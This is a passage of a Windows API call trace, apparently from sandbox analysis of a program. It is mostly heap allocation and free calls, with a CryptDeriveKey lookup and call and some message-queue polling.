RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0182.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0182.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0182.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0182.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0182.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0182.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0182.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0182.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0182.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0182.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0182.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0182.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0182.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0182.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0182.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0182.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0182.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0182.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0182.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0182.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0182.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0182.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0182.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50b78 [0182.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0182.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.133] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0182.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0182.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0182.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0182.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0182.134] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87690, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0182.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0182.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0182.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0182.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0182.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0182.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0182.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0182.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0182.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0182.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0182.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0182.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0182.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0182.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0182.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0182.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0182.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0182.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0182.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0182.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0182.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0182.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0182.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b90 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0182.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0182.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0182.140] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 